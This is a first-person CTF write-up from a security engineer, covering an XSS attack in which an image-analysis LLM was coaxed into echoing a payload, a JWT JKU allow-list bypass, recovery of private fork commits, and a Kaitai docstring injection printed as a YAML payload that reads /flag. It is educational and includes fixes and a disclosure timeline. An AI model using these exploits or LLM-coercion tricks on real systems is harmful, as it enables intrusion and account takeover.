Overview

Security Engineer Shoshana Makinen recounts her experience at her first Anvil HammerCon and the methodology she used to win the 2026 Capture the Flag challenge. Drawing on her prior CTF experience, she explains how she leveraged large-language-model output as an unexpected injection surface, abused flawed JWT JKU validation to forge authenticated webhook requests, and achieved remote code execution by weaponizing unsafe code generation in Kaitai. With insight into the hacker mindset and the value of persistence, Shoshana demonstrates how CTFs can be powerful tools for professional growth: they rekindle curiosity, sharpen real-world intuition, and build confidence in high-talent environments.

By Shoshana Makinen

When I first started working at Anvil less than a year ago, I was taken aback by the sheer amount of talent and professionalism I observed in my colleagues, and I immediately wanted to meet everyone I worked with. Unfortunately, between the REAL ID requirements for flying in the US and my recently expired passport, I couldn't fly to the Seattle office to see some of them in person. I was excited, then, when I heard about HammerCon, where the whole company travels to a common location for a few days of team building and presentations on research and personal expertise. I got my new passport in anticipation and awaited the announcement of where the conference would be held. There was a call for presentations, and everyone was encouraged to submit one. I must admit that my imposter syndrome got the better of me: knowing it was my first year with the company, and imagining how critical people might be, I couldn't bring myself to submit a presentation. I also heard about the Capture the Flag (CTF) game to be held in the days before HammerCon, and my interest was piqued.

I have recently been getting back into CTFs as a way to get excited about security problems again, after a hiatus during which I was busy applying the skills I had previously learned from them. I participated with RPISEC's team in college, and my biggest regret from that time is that I didn't participate with them more. I showed up to the first RPISEC meeting freshman year with naive ideas of what it means to be a hacker and few, if any, skills relevant to actual hacking. We dove straight into disassembling and exploiting x86 binaries, and I didn't yet know how to read the C code they were compiled from. I was embarrassed that I couldn't keep up, so I decided to focus on my computer science curriculum for the first couple of years of college until I understood computers well enough to begin thinking outside the box about how they work. Junior year, I took my first security-focused class, Modern Binary Exploitation, and suddenly all the concepts that had been beyond my reach a couple of years earlier were intuitive to understand and apply. I was hooked and began participating in CTFs with the RPISEC team. I love how these games make you think and let you work with concepts that are hard to find in the real world, so that you can recognize their patterns when they do appear. Because CTFs give you problems that you know have solutions, they train you to assume the same of real-world targets: that they can be attacked given proper perseverance and skill.

The HammerCon CTF was built around a single application containing three "main quests" and four "side quests" that supported them. The first main quest was to create an account in the application and have that account approved by an administrator. The second was to exploit the application's payment system to obtain a "premium" account. The last involved exploiting a zero-day in one of the application's dependencies to gain remote code execution and read a flag file. Along the way, the side quests required reconnaissance: finding the application's source code on GitHub and uncovering flags hidden in the repository and related assets.

First Main Quest Initial Attempt



When the competition began, I focused on the first main quest, as I had a hunch about what it would require. Whenever I see a web challenge that involves getting an administrator to perform some action, I know we are likely looking at either an authorization issue or a cross-site scripting (XSS) issue. I focused on XSS first for two reasons: I didn't have the application source code yet and wasn't sure how the APIs were structured, which made an authorization issue harder to pursue, and there was a hint that administrators frequently reviewed new account submissions. The only inputs we had as attackers were our username and a profile picture, which was analyzed by an LLM whose analysis appeared on our profile page.

Initially, out of due diligence, I tried injecting into the username and submitting SVG images with embedded payloads, but I found that usernames were safely rendered into the page and I couldn't find a way to coerce an administrator into visiting the SVG payloads. Because it was a CTF challenge, I knew the AI feature wouldn't have been implemented if it weren't important, so I turned my attention there. I intercepted an API response containing the LLM's analysis of the image, replaced the analysis with an XSS payload, and confirmed that it was indeed being injected into the page unsafely. It became apparent that we had to find some way to coerce the LLM into responding with a working XSS payload. After some trial and error, I got the LLM to respond with a basic XSS payload and triggered the "Hello world" of XSS: a JavaScript alert. The problem was that the LLM tended to summarize my payload, often mangling it to the point that it no longer worked. On most tests, we would stop here and write up a finding, since a JavaScript alert is enough to demonstrate the problem, with actual exploitation left as an exercise for the reader. There is no partial credit in a CTF, however, so I turned my focus to developing the payload that I would later try to coerce the LLM into returning.
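The underlying bug is that model output was treated as trusted markup. The challenge front end was built with Vue.js, so the real sink was presumably client-side, and its exact form isn't shown here. As a language-neutral illustration only, the following minimal Python sketch (all names hypothetical) contrasts concatenating model output into HTML with escaping it via the standard library's `html.escape`, the kind of handling the username field evidently received.

```python
import html


def render_analysis_unsafe(analysis: str) -> str:
    # Hypothetical sink: LLM output is concatenated straight into markup,
    # so any tags the model emits become live HTML.
    return "<div class='analysis'>" + analysis + "</div>"


def render_analysis_safe(analysis: str) -> str:
    # Escaping &, <, >, and quotes turns the same output into inert text.
    return "<div class='analysis'>" + html.escape(analysis) + "</div>"


# Hypothetical model output describing an uploaded image.
llm_output = "A cat photo. <img src=x onerror=alert(1)>"
print(render_analysis_unsafe(llm_output))
print(render_analysis_safe(llm_output))
```

Escaping at the point of rendering neutralizes the payload no matter how the model was coaxed into producing it, which is why the fix belongs at the sink rather than in the prompt.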

Side Quests

I decided then that I needed to work on some side quests to get access to the application's source code to support the main quests. I noticed one API call that mentioned the author's username; I searched for it on GitHub and quickly found the application's source code, whose README contained my first actual flag. I spent some time on the other side quests and found the author's blog, a static site hosted on GitHub, which held two flags: one in the client-side code implementing a paywall and one in the site's history on archive.org. The last side quest was titled simply "private" and hinted that the flag would be wherever the OpenAI key used for the LLM functionality was. This made me think that the flag must have been pushed to the repository at some point, but I couldn't find it anywhere in the repository's history. I was honestly stumped and took a shot in the dark by searching the developer's blog for the word "private." To my surprise, this gave me a lead: the blog had a post on a concept that was new to me at the time, called Cross Fork Object Reference (CFOR). I later learned that James Martindale had covered this concept in a presentation at the previous year's HammerCon; for more information on the issue, I encourage you to watch his presentation at BSides PDX. To summarize, when you make a fork of a public repository, your commits remain accessible through the public repository even after your fork is made private. All that is required to find these commits is to guess the beginning of their commit hash. I tried to script a solution but quickly found a tool on GitHub that located the target commit.
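The brute-force idea behind CFOR is small enough to sketch. Assuming, as the CFOR research describes, that GitHub resolves commit prefixes as short as four hex characters, there are only 16^4 = 65,536 candidates to try against the public repository's commit URLs. The sketch below uses placeholder owner and repository names, generates those candidates, and includes an unexercised `probe` helper. It is not the GitHub tool mentioned above, and a real run would have to contend with GitHub's rate limiting and with prefixes that match more than one commit.

```python
import itertools
import urllib.error
import urllib.request
from typing import Iterator

HEX = "0123456789abcdef"


def candidate_prefixes(length: int = 4) -> Iterator[str]:
    # Every hex string of the given length: 16**length candidates in order.
    for chars in itertools.product(HEX, repeat=length):
        yield "".join(chars)


def commit_url(owner: str, repo: str, prefix: str) -> str:
    # Commits from forks are looked up through the public (upstream) repository.
    return f"https://github.com/{owner}/{repo}/commit/{prefix}"


def probe(url: str, timeout: float = 10.0) -> int:
    # Returns the HTTP status code. Assumption: 200 means the prefix resolved
    # to a commit; anything else (404, or an ambiguous prefix) means it did not.
    req = urllib.request.Request(url, method="HEAD")
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        return err.code
```

A run would iterate over `candidate_prefixes()` and call `probe(commit_url(owner, repo, prefix))` for each, pacing requests and filtering out commits already visible in the public history.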

Second Main Quest



I moved on to the second main quest because I needed a fresh problem to consider. I was glad I had already found the source code, as I wouldn't have been able to understand the application's inner workings well enough to complete this challenge without it. A separate site handled payments: when a payment succeeded, it signed a JWT and sent it to the main site through a webhook.
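For context on why a token's own header matters: a JWT is three base64url segments (header, payload, signature), and anyone can decode the header before any signature check. RFC 7515 defines a `jku` (JWK Set URL) header parameter naming where the verification keys live, so a verifier that fetches keys from that URL is letting the token choose its own verifier, leaving URL validation as the only defense. A minimal stdlib sketch, with hypothetical function names:

```python
import base64
import json


def b64url_decode(segment: str) -> bytes:
    # JWT segments are base64url with padding stripped; restore it first.
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def unverified_header(token: str) -> dict:
    # Anyone can read the header before a signature is checked, so every
    # field in it, including jku, is attacker-controlled input.
    header_b64, _payload_b64, _signature_b64 = token.split(".")
    return json.loads(b64url_decode(header_b64))
```

A verifier built this way reads `unverified_header(token)["jku"]` and fetches keys from the result. Safer designs pin the expected key or JWK Set URL in server configuration instead of trusting the token to name it.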

The development deployment of the app allowed you to supply a hardcoded card value to simulate a successful transaction, but the real deployment used in the competition did not. Reviewing the main site's JWT verification code, I found that it parsed the JKU (JWK Set URL) from the JWT's header and used it to fetch the public key for verifying the JWT's signature. It became clear that controlling this JKU would let me supply a public key of my own choosing and thereby authenticate to the webhook as the payment site. Diving into the JKU fetching logic, I found that the value was validated by the following code:

```python
ALLOWED_JKU_DOMAINS = ["payment..com"]

def _validate_jku_url(jku_url: str) -> bool:
    """Validate that the JKU URL is from an allowed domain (supports *.domain.com wildcards)"""
    try:
        host = b""
        try:
            host = httpx.URL(jku_url).host
        except httpx.InvalidUrl:
            return False

        logger.info(f"JKU validation - URL: {jku_url}, host: {host}")
        logger.info(f"Allowed domains: {ALLOWED_JKU_DOMAINS}")

        # Check exact matches first
        if host in ALLOWED_JKU_DOMAINS:
            logger.info(f"JKU URL validation result: True (exact match)")
            return True

        # Check wildcard matches
        for allowed_domain in ALLOWED_JKU_DOMAINS:
            if len(allowed_domain) > 2 or allowed_domain.startswith("*."):
                # Extract the base domain from the wildcard pattern
                # e.g., "*.example.com" -> "example.com"
                base_domain = allowed_domain[allowed_domain.find(".") + 1 :]

                # Check if host ends with the base domain
                # e.g., "api.example.com" ends with "example.com"
                if host.endswith("." + base_domain) or host == base_domain:
                    logger.info(
                        f"JKU URL validation result: True (wildcard match with {allowed_domain})"
                    )
                    return True

        logger.info(f"JKU URL validation result: False (no match found)")
        return False

    except Exception as e:
        logger.error(f"JKU URL validation error: {str(e)}")
        return False
```

This logic appears to validate that the JKU's host is in an allowed list of domains, but there is a fatal flaw in the wildcard check on line 22, `if len(allowed_domain) > 2 or allowed_domain.startswith("*."):`. Because of the `or`, the condition short-circuits to true for any allowed domain longer than two characters, so every entry is processed as if its leftmost label were a wildcard. This was interesting because it widened the set of accepted JKU URLs to any URL hosted on the CTF challenge's parent domain.

It was at this point that I needed to take a break to pack for HammerCon and drop my dog off with my parents, who would take care of him while I was away. On the drive home, though, I pondered where I could host a JWK Set that would pass this validation and eventually realized that, as part of the user registration process, I could submit custom content as the account's profile picture, which was served by the main site. When I got home, I was disappointed to find that the profile picture required cookie authentication and that the server-side JKU fetch wouldn't be able to retrieve it directly. I then widened my search for other ways the profile picture might be accessed and realized there must be another path that admins use to view arbitrary users' profile pictures by user ID. I found the API route responsible for serving profile pictures to administrators, and it conveniently did not require authentication. Note in the following code snippet from backend/routers/admin.py that, unlike delete_user, which depends on get_current_admin_user, the profile picture endpoint never authenticates the caller's session.

```python
@router.get("/user/{user_uuid}/picture")
def get_user_picture(user_uuid: str, db: Session = Depends(get_db)):
    user = db.query(User).filter(User.uuid == user_uuid).first()
    if not user:
        raise HTTPException(status_code=404, detail="User not found")
    if not user.profile_picture:
        raise HTTPException(status_code=404, detail="No profile picture found")

    # Return the binary image data with appropriate content type
    return Response(
        content=user.profile_picture,
        media_type=user.mime_type,
        headers={"Cache-Control": "max-age=3600"}  # Cache for 1 hour
    )

@router.delete("/user/{user_uuid}", response_model=dict)
def delete_user(user_uuid: str, current_admin: User = Depends(get_current_admin_user), db: Session = Depends(get_db)):
    ...
```
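Putting the two findings together: the wildcard branch of `_validate_jku_url` accepts any host under the parent domain, including the main site that serves the unauthenticated picture route. The sketch below mirrors that branch using `urllib.parse.urlsplit` in place of `httpx.URL`, with a hypothetical stand-in for the redacted allow-list entry and a hypothetical URL path (the router's mount prefix isn't shown). It compares the original condition with one plausible fix: replacing `or` with `and` so that only explicit `*.` entries act as wildcards.

```python
from urllib.parse import urlsplit

# Hypothetical stand-in for the redacted entry in the challenge's allow-list.
ALLOWED_JKU_DOMAINS = ["payment.ctf.example"]


def is_allowed(url: str, fixed: bool = False) -> bool:
    """Mirror of _validate_jku_url's host checks; fixed=True applies one plausible fix."""
    host = urlsplit(url).hostname or ""  # stand-in for httpx.URL(url).host
    if host in ALLOWED_JKU_DOMAINS:
        return True
    for allowed_domain in ALLOWED_JKU_DOMAINS:
        if fixed:
            # Only explicit "*.domain" entries are treated as wildcards.
            is_wildcard = len(allowed_domain) > 2 and allowed_domain.startswith("*.")
        else:
            # Original logic: `or` makes every entry longer than two characters
            # a wildcard; startswith() is only consulted for shorter entries.
            is_wildcard = len(allowed_domain) > 2 or allowed_domain.startswith("*.")
        if is_wildcard:
            # Everything after the first dot becomes the base domain.
            base_domain = allowed_domain[allowed_domain.find(".") + 1 :]
            if host.endswith("." + base_domain) or host == base_domain:
                return True
    return False


# Hypothetical JKU aimed at the unauthenticated admin picture route on the main site.
jku = "https://app.ctf.example/api/admin/user/USER-UUID/picture"
print(is_allowed(jku))              # True: "app.ctf.example" ends with ".ctf.example"
print(is_allowed(jku, fixed=True))  # False: no exact match and no "*." entry
```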

With these primitives, I could upload a JWK Set containing my own public key as my profile picture and craft a JWT whose JKU pointed at the unauthenticated admin picture endpoint for my account, so the signature verification passed using a key I controlled. I then sent this JWT to the webhook in a request structured like a real payment completion notification, which marked my account as "premium" and obtained the flag.
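The forged token itself only needs a JWK Set and a header pointing at it. Here is a minimal stdlib sketch of those two pieces, following the JWK format in RFC 7517; the claim names, `kid`, and URL are hypothetical, since the webhook's expected payload isn't reproduced here. The RS256 signature over the returned signing input still has to be produced with the matching private key using a real cryptography library, which this sketch deliberately leaves out.

```python
import base64
import json


def b64url(data: bytes) -> str:
    # JOSE uses base64url with the trailing "=" padding removed.
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def int_to_b64url(value: int) -> str:
    # JWK encodes RSA integers as minimal-length big-endian byte strings.
    length = max(1, (value.bit_length() + 7) // 8)
    return b64url(value.to_bytes(length, "big"))


def build_jwks(n: int, e: int, kid: str) -> dict:
    # A JWK Set holding one RSA public key: the document the JKU points to.
    return {
        "keys": [
            {"kty": "RSA", "use": "sig", "alg": "RS256", "kid": kid,
             "n": int_to_b64url(n), "e": int_to_b64url(e)}
        ]
    }


def build_signing_input(jku: str, kid: str, claims: dict) -> str:
    # Returns base64url(header) + "." + base64url(claims). The RS256 signature
    # over these ASCII bytes must still be computed with the matching private key.
    header = {"alg": "RS256", "typ": "JWT", "jku": jku, "kid": kid}
    return ".".join(
        b64url(json.dumps(part, separators=(",", ":")).encode("utf-8"))
        for part in (header, claims)
    )


print(int_to_b64url(65537))  # AQAB, the usual encoding of the RSA exponent 65537
```

Including `kid` in both the header and the key is a hedge in case the verifier selects keys by ID; whether this application did is an assumption.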



Final Main Quest

For the third challenge, we were told that we would need to exploit a zero-day vulnerability in the application's main dependency, Kaitai. Once an account was approved and paid for, the application's sole functionality was to compile Kaitai structures to Python code and execute the resulting code, returning the output through the UI. Once the vulnerability was exploited, we were told, we would be able to read the flag from the filesystem of our code execution environment. Kaitai is a tool that uses a YAML definition of a file format to generate parsing code in a variety of programming languages. In Kaitai's typical use case, the party developing the structure is trusted, so I figured that the most likely vulnerability was one in which a malicious structure compiles into malicious code. Kaitai has a few interesting features that immediately piqued my interest under this threat model. The first avenue I explored was the import functionality, as I knew that if it resulted in a Python import of another file, it would also execute that file. The problem, however, was that any imported file must end in Kaitai's .ksy extension and must exist and be compilable as a Kaitai structure. I didn't immediately see a way to bypass these requirements, and even if I could, I didn't see a way to upload additional files to import. I briefly considered importing a library already on the filesystem, but I couldn't think of one that would give me the arbitrary code execution I wanted even if I figured out how. I moved on to other features and noticed that structures could include docstrings, which would be inserted into a comment block in the resulting code.

This was interesting to me because I knew that each of the supported languages handles comment blocks differently, and it seemed unlikely that a project that typically deals with trusted inputs would go to the effort of handling each one safely. I tried the following input to see what the output would look like:

```yaml
meta:
  id: "test"
  file-extension: "test"
  endian: be
doc: "\"\"\"\nprint(open('/flag').read())\n\"\"\""
```

The compiler produced the following Python:

```python
# This is a generated file! Please edit source .ksy file and use kaitai-struct-compiler to rebuild
# type: ignore

import kaitaistruct
from kaitaistruct import KaitaiStruct, KaitaiStream, BytesIO


if getattr(kaitaistruct, 'API_VERSION', (0, 9)) < (0, 11):
    raise Exception("Incompatible Kaitai Struct Python API: 0.11 or later is required, but you have %s" % (kaitaistruct.__version__))

class Test(KaitaiStruct):
    """"""
    print(open('/flag').read())
    """"""
    def __init__(self, _io, _parent=None, _root=None):
        super(Test, self).__init__(_io)
        self._parent = _parent
        self._root = _root or self
        self._read()

    def _read(self):
        pass

    def _fetch_instances(self):
        pass
```

I later realized that I probably should have included tab characters in my injected input to get the indentation right, but I was delighted to see that Kaitai automatically indented each line of my input and the injection worked as-is. I passed this structure file to the application and obtained the flag for the challenge.
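The bug class is easy to reproduce in miniature. The following Python sketch is a hypothetical emitter that mimics the output pattern observed above (wrap the doc text in triple quotes, then indent every line into the class body); it makes no claim about how kaitai-struct-compiler is actually implemented. It contrasts that approach with emitting the docstring via `repr()`, which always yields a single well-formed string literal, and uses `ast` to check whether the generated module contains any function calls.

```python
import ast


def emit_class_naive(name: str, doc: str) -> str:
    # Hypothetical emitter reproducing the observed pattern: the doc text is
    # wrapped in triple quotes and each line is indented into the class body.
    body = '"""' + doc + '"""'
    lines = [f"class {name}:"] + ["    " + line for line in body.split("\n")]
    return "\n".join(lines + ["    pass"]) + "\n"


def emit_class_safe(name: str, doc: str) -> str:
    # repr() produces one escaped literal on a single line, so no doc content
    # can close the string early.
    return f"class {name}:\n    {doc!r}\n    pass\n"


def contains_call(source: str) -> bool:
    # True if any function call appears anywhere in the generated module.
    return any(isinstance(node, ast.Call) for node in ast.walk(ast.parse(source)))


doc = "\"\"\"\nprint(open('/flag').read())\n\"\"\""
print(emit_class_naive("Test", doc))
print(contains_call(emit_class_naive("Test", doc)))  # True
print(contains_call(emit_class_safe("Test", doc)))   # False
```

In the naive output, the injected `"""` sequences turn the docstring into two empty string literals with a live `print` call between them, matching the generated code above.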

First Main Quest Revisited

With this completed, only the first main quest remained, and I began brainstorming XSS payloads. I initially looked for a "win" function that could be called to approve my account, and while I found one, I realized that the application's front end was implemented in Vue.js. This meant that I couldn't call the function directly, because it wasn't reachable from the global window context my payload would execute in. I considered designing a payload that made the approval request itself using the fetch API, but realized that any added complexity would significantly increase the risk that the LLM would summarize, and therefore neutralize, the payload. Instead, I found that the simplest payload I could muster would trigger a click event on the approve button, which would in turn trigger the win function. Images containing the plain text of my payload were still being summarized, though, so I began trying to get my payload reflected through coercion and prompt injection techniques. This ended up being a total rabbit hole; I even reached out to my group chat full of LLM hackers for advice, and ultimately got nowhere. One thing this research taught me, though, was that LLM outputs are probabilistic and can differ each time the model evaluates the same input. This prompted me to write a script that would resubmit a payload repeatedly and check whether the resulting analysis contained my payload unaltered. After letting this script run for a while, I determined that I needed an even simpler payload. I noticed that the LLM would often summarize payloads whose tag attributes were separated by spaces. For example, `<img src=test onerror=alert() />` would often be summarized to `<img src=... onerror=... />`. I browsed a list of XSS payloads for ideas on how to build a payload that the LLM would see as one unbroken string that should not be summarized.
I found a way of eliminating spaces from the payload that some parsers accept: replacing the spaces in a tag with forward slashes, which the parser may interpret as delimiters. I passed the following payload to my script and, to my surprise, the first submission came back with my payload reflected exactly:

![]()

After a few seconds of waiting, my payload was loaded and executed by the administrator's account, and the final challenge was solved.
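The resubmission loop described in this section is simple to sketch. In the version below, `submit` is a hypothetical callable standing in for "render the payload into an image, upload it, and return the LLM's analysis", and success is a plain substring check for the payload reflected byte-for-byte. The fake LLM and the `<i/id=probe>` marker are illustrative only and are not the payload used in the challenge.

```python
from typing import Callable, Optional


def resubmit_until_reflected(
    payload: str,
    submit: Callable[[str], str],
    max_attempts: int = 100,
) -> Optional[int]:
    # Because sampling is nondeterministic, the same payload can come back
    # intact on some attempts and summarized on others, so keep retrying.
    for attempt in range(1, max_attempts + 1):
        analysis = submit(payload)
        if payload in analysis:  # reflected exactly, not summarized
            return attempt
    return None


def make_fake_llm(mangle_first: int) -> Callable[[str], str]:
    # Hypothetical stand-in: summarizes the first `mangle_first` submissions,
    # then echoes the payload verbatim.
    calls = {"n": 0}

    def fake(payload: str) -> str:
        calls["n"] += 1
        if calls["n"] <= mangle_first:
            return "The image shows code: <img src=... onerror=... />"
        return f"The image shows the text {payload}"

    return fake


print(resubmit_until_reflected("<i/id=probe>", make_fake_llm(2)))  # 3
```

Returning the attempt number rather than a boolean makes it easy to compare how reliably different payload shapes survive summarization.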

Conclusion

These challenges were a lot of fun to think about, and I always learn a couple of new tricks every time I play in a CTF. I am grateful for the effort and thought that went into designing them. When I got to HammerCon, everyone was incredibly congratulatory about my completing all the challenges, and I was surprised to receive such recognition from such talented people. I finally got to meet the colleagues I had been relying on for the last several months and was delighted by the wonderful personalities I encountered. The talks were all very engaging, and it was awesome and inspiring to see what everyone has been working on. I discovered that my fears of being unduly criticized by my peers were unfounded, and it is now my goal to submit a presentation for the next HammerCon. I'm lucky to work for a company like Anvil, which sees the value in hosting events like HammerCon and the accompanying CTF as a way of building goodwill between teammates and advancing everyone's careers. Now that I have faces, voices, and personalities to attach to my coworkers' messages, I feel I can relate to them on another level, and that makes it much easier to reach out when I need help on a project. Overall, it was a successful HammerCon. I'm happy that I managed to get my passport in time to go, and I look forward to next year's!

Coordinated Disclosure Timeline:

- 2026-02-02: Anvil contacts the Kaitai Struct Compiler maintainer to report the issue.

- 2026-02-06 to 2026-02-20: Anvil sends follow-up emails regarding the report.

- 2026-02-26: Anvil opens a GitHub issue to ask for the appropriate reporting path.

- 2026-03-02: The maintainer reviews the report, responds helpfully, and clarifies that the reported behavior falls outside Kaitai's security model and therefore will not be addressed as a security issue. They also point to a public GitHub comment from January 2023 showing that this behavior had already been discussed publicly.